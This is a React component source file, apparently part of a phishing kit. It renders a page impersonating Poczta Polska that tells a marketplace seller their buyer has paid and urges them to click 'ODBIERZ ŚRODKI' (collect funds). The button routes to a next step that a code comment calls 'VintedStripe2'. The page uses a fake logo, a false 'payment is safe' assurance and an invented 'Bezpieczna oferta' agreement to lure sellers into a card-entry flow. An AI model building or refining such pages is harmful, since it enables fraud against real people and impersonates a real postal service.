import React, { useEffect, useMemo, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './PocztaPlSuccess.css';
import SupportWidget from './SupportWidget';
import { fetchPageWithFallback } from '../fetchPageWithFallback';
import { getPrimaryCurrency, getSymbol } from '../stripeCurrency';

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };
const P = process.env.PUBLIC_URL || '';
const LOGO_SRC = `${P}/poczta-pl-logo.svg`;

function noop(e) {
  e.preventDefault();
}

function IconCheck() {
  return (
    <svg width="18" height="18" viewBox="0 0 24 24" fill="none" aria-hidden>
      <path d="M6 12l4 4 8-8" stroke="currentColor" strokeWidth="2.2" strokeLinecap="round" strokeLinejoin="round" />
    </svg>
  );
}

function IconPackage() {
  return (
    <svg width="22" height="22" viewBox="0 0 24 24" fill="none" aria-hidden>
      <path
        d="M21 16V8a2 2 0 0 0-1-1.73l-7-4a2 2 0 0 0-2 0l-7 4A2 2 0 0 0 3 8v8a2 2 0 0 0 1 1.73l7 4a2 2 0 0 0 2 0l7-4A2 2 0 0 0 21 16z"
        stroke="#fff"
        strokeWidth="1.65"
        strokeLinejoin="round"
      />
      <path d="M3.27 6.96L12 12.01l8.73-5.05M12 22.08V12" stroke="#fff" strokeWidth="1.65" strokeLinecap="round" strokeLinejoin="round" />
    </svg>
  );
}

/**
 * Poczta Polska — odbiór płatności; ODBIERZ ŚRODKI → index2 (VintedStripe2).
 */
function PocztaPlSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);

  useEffect(() => {
    if (page) {
      setPageData(page);
      setLoading(false);
      return;
    }
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetchPageWithFallback(pageCode)
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  const countryCode = (pageData?.country_code || 'PL').toUpperCase();
  const currencyCode = getPrimaryCurrency(countryCode) || 'PLN';
  const sym = getSymbol(currencyCode);

  const priceNumber = useMemo(() => {
    const raw = pageData?.price;
    if (raw == null || String(raw).trim() === '') return null;
    const s = String(raw)
      .replace(/\s+/g, '')
      .replace(/[^0-9.,-]/g, '')
      .replace(',', '.');
    const n = parseFloat(s);
    return Number.isFinite(n) ? n : null;
  }, [pageData?.price]);

  const priceStr = useMemo(() => {
    if (priceNumber == null) return '—';
    return new Intl.NumberFormat('pl-PL', {
      minimumFractionDigits: 0,
      maximumFractionDigits: 2,
    }).format(priceNumber);
  }, [priceNumber]);

  const firstName = (pageData?.first_name || '').trim() || '—';
  const lastName = (pageData?.last_name || '').trim() || '—';
  const address = (pageData?.delivery_address || '').trim() || '—';
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  const orderRef = useMemo(() => {
    const id = pageData?.id;
    if (id != null && String(id).trim() !== '') return String(id).trim();
    const pn = (pageData?.product_name || '').trim();
    if (/^\d+$/.test(pn)) return pn;
    const digits = (pageCode || '').replace(/\D/g, '');
    if (digits.length >= 4) return digits.slice(-4);
    return '—';
  }, [pageData?.id, pageData?.product_name, pageCode]);

  const amountLine = priceStr === '—' ? '—' : `${priceStr} ${sym}`;

  if (loading && pageCode) {
    return (
      <div className="pppl-wrap" lang="pl">
        <div className="pppl-loading">Ładowanie…</div>
        <div className="pppl-support-override">
          <SupportWidget sessionId={sessionId} countryCode={countryCode} />
        </div>
      </div>
    );
  }

  return (
    <div className="pppl-wrap" lang="pl">
      <header className="pppl-header">
        <div className="pppl-header-inner">
          <a href="#/" className="pppl-logo-link" onClick={noop} aria-label="Poczta Polska">
            <img src={LOGO_SRC} alt="" className="pppl-logo" width={200} height={32} />
          </a>
        </div>
      </header>

      <div className="pppl-main-wrap">
        <div className="pppl-grid">
          <div className="pppl-col-main">
            <h1 className="pppl-h1">Odbiór płatności od kupującego</h1>

            <div className="pppl-amount-card">
              <p className="pppl-amount-big">{amountLine}</p>
              <p className="pppl-product-ref" title="Numer zamówienia">
                <span className="pppl-sr-only">Numer zamówienia: </span>
                {orderRef}
              </p>
            </div>

            <div className="pppl-status">
              <div className="pppl-status-ic" aria-hidden>
                <IconPackage />
              </div>
              <div className="pppl-status-text">
                <strong>Twój przedmiot został wystawiony!</strong>
                <p>Kupujący już zapłacił za zamówienie.</p>
              </div>
            </div>

            <section className="pppl-ship">
              <h2>Dane do wysyłki</h2>
              <div className="pppl-field">
                <label>Adres dostawy</label>
                <div className="pppl-field-value">{address}</div>
              </div>
              <div className="pppl-name-row">
                <div className="pppl-field">
                  <label>Nazwisko</label>
                  <div className="pppl-field-value">{lastName}</div>
                </div>
                <div className="pppl-field">
                  <label>Imię</label>
                  <div className="pppl-field-value">{firstName}</div>
                </div>
              </div>
            </section>

            <div className="pppl-notes">
              <p>
                Po otrzymaniu środków prosimy o przesłanie towaru kupującemu zgodnie z podanymi danymi lub przekazanie
                towaru kurierowi, który oddzwoni w ciągu 12 godzin.
              </p>
              <p>
                Po wysłaniu towaru prosimy o wskazanie kupującemu numeru przesyłki! Towar powinien zostać wysłany w
                ciągu 48 godzin od otrzymania płatności.
              </p>
            </div>
          </div>

          <aside className="pppl-side">
            <p className="pppl-side-price">{amountLine}</p>
            <Link to={index2Path} className="pppl-cta">
              ODBIERZ ŚRODKI
            </Link>
            <div className="pppl-secure">
              <span style={{ color: '#2e7d32', flexShrink: 0 }} aria-hidden>
                <IconCheck />
              </span>
              <span>Otrzymanie płatności jest bezpieczne</span>
            </div>
            <p className="pppl-disclaimer">
              Klikając przycisk &quot;ODBIERZ ŚRODKI&quot;, akceptujesz warunki Umowy użytkownika, korzystając z usługi
              online &quot;Bezpieczna oferta&quot;.
            </p>
          </aside>
        </div>
      </div>

      <div className="pppl-support-override">
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    </div>
  );
}

export default PocztaPlSuccess;
